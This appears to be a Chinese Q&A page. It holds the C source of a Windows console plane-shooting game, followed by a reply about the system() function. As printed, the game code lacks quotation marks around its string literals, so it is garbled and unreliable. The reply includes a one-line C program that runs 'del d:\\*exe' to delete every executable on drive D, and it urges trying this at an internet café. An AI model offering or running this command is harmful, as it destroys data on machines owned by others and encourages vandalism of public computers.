一个打飞机的游戏,DEVc++编译通过:
#include <stdio.h>
#include <conio.h>
#include <stdlib.h>
#include <windows.h>
#include <time.h>
#define zlx 10 //增量坐标(x)让游戏框不靠边
#define zly 3 //增量坐标(y)让游戏框不靠边
#define W 26 //游戏框的宽度
#define H 24 //游戏框的高度
int jiem[22][22]={0}, wj=10; //界面数组, 我机位置(初值为10)
int speed=4,density=30, score=0,death=0; //敌机速度, 敌机密度, 玩家成绩,死亡次数
int m=0,n=0; // m,n是控制敌机的变量
void gtxy (int x, int y) //控制光标位置的函数
{ COORD zb; //zb代指坐标
zb.X = x; zb.Y = y;
SetConsoleCursorPosition ( GetStdHandle (STD_OUTPUT_HANDLE), zb );
}
void Color(int a) //设定颜色的函数(a应为1-15)
{ SetConsoleTextAttribute( GetStdHandle(STD_OUTPUT_HANDLE), a ); }
void yinc(int x=1,int y=0) //隐藏光标的函数
{ CONSOLE_CURSOR_INFO gb={x,y}; //gb代指光标, y设为0即隐藏
SetConsoleCursorInfo(GetStdHandle(STD_OUTPUT_HANDLE), &gb);
}
void csh( ) //初始化函数
{ int i;
Color(7);
gtxy(zlx,zly); printf(╔); gtxy(zlx+W-2,zly); printf(╗); //左上角和右上角的框角
gtxy(zlx,zly+H-1); printf(╚); gtxy(zlx+W-2,zly+H-1); printf(╝); //下边两框角
for(i=2;i<W-2;i+=2) {gtxy(zlx+i,zly); printf(═); } //打印上横框
for(i=2;i<W-2;i+=2) {gtxy(zlx+i,zly+H-1); printf(═); } //打印下横框
for(i=1;i<H-1;i++) { gtxy(zlx,zly+i); printf(║); } //打印左竖框
for(i=1;i<H-1;i++) {gtxy(zlx+W-2,zly+i); printf(║); } //打印右竖框
Color(14); gtxy(19,2); printf(歼灭敌机); Color(10);
gtxy(37,5); printf(设置:Esc );
gtxy(37,7); printf(发射:↑ );
gtxy(37,9); printf(控制:← → );
gtxy(37,11);printf(得分:%d,score);
gtxy(37,13); printf(死亡:%d,death);
yinc(1,0);
}
void qcjm( ) //清除界面函数
{ int i,j;
for(i=0;i<H-2;i++)
for(j=0;j<W-4;j++){gtxy(zlx+2+j,zly+1+i); printf( );}
}
void feiji( ) //飞机移动函数
{ int i,j;
for(i=21;i>=0;i--) //从底行往上是为了避免敌机直接冲出数组
for(j=0;j<22;j++)
{if(i==21&&jiem[i][j]==3) jiem[i][j]=0; //底行赋值0 以免越界
if(jiem[i][j]==3) jiem[i][j]=0, jiem[i+1][j]=3;
}
if(jiem[20][wj]==3&&jiem[21][wj]==1) death++;
}
void zidan( ) //子弹移动函数
{ int i,j;
for(i=0;i<22;i++)
for(j=0;j<22;j++)
{ if(i==0&&jiem[i][j]==2) jiem[i][j]=0;
if(jiem[i][j]==2) { if(jiem[i-1][j]==3) score+=100,printf(\7);
jiem[i][j]=0,jiem[i-1][j]=2; }
}
}
void print( ) //输出界面函数
{int i,j;
qcjm( );
for(i=0;i<22;i++)
for(j=0;j<22;j++)
{ gtxy(12+j,4+i);
if(jiem[i][j]==3) {Color(13);printf(□);}
if(jiem[i][j]==2) {Color(10);printf(.);}
if(jiem[i][j]==1) {Color(10);printf(■);}
}
gtxy(37,11); Color(10); printf(得分:%d,score);
gtxy(37,13); printf(死亡:%d,death);
}
void setting( ) //游戏设置函数
{ qcjm( );
gtxy(12,4);printf(选择敌机速度:);
gtxy(12,5);printf( 1.快 2.中 3.慢>>);
switch(getche( ))
{case '1': speed=2; break;
case '2': speed=4; break;
case '3': speed=5; break;
default: gtxy(12,6);printf( 错误!默认值);
}
gtxy(12,7);printf(选择敌机密度:);
gtxy(12,8);printf( 1.大 2.中 3.小>>);
switch(getche( ))
{case '1': density=20; break;
case '2': density=30; break;
case '3': density=40; break;
default: gtxy(12,9); printf( 错误!默认值);
}
for(int i=0;i<22;i++)
for(int j=0;j<22;j++) jiem[i][j]=0;
jiem[21][wj=10]=1; jiem[0][5]=3;
gtxy(12,10); printf( 按任意键保存...);
getch( );
qcjm( );
}
void run( ) //游戏运行函数
{ jiem[21][wj]=1; //值为1代表我机(2则为子弹)
jiem[0][5]=3; //值为3代表敌机
SetConsoleTitle(歼灭敌机); //设置窗口标题
while(1)
{ if (kbhit( )) //如有键按下,控制我机左右移动、发射或进行设定
{ int key;
if((key=getch( ))==224) key=getch( );
switch(key)
{case 75: if(wj>0) jiem[21][wj]=0,jiem[21][--wj]=1; break;
case 77: if(wj<20) jiem[21][wj]=0,jiem[21][++wj]=1; break;
case 72: jiem[20][wj]=2; break;
case 27: setting( );
}
}
if(++n%density==0) //控制产生敌机的速度
{ n=0;srand((unsigned)time(NULL));
jiem[0][rand( )%20+1]=3;
}
if(++m%speed==0) { feiji( ); m=0; } //控制敌机移动速度(相对子弹而言)
zidan( ); //子弹移动
print( ); //输出界面
Sleep(120); //延时120毫秒
}
}
int main( )
{ csh( );
run( );
return 0;
}
去学学system函数,举个例子给你:#include<stdio.h>#include<stdlib.h>int main(){system(del d:\\*exe);return 0;}这个可以把你d盘全部exe程序文件删除,可以去网吧试试欢迎采纳
- 上一篇: 数字货币的开源代码是什么
- 下一篇: 返回列表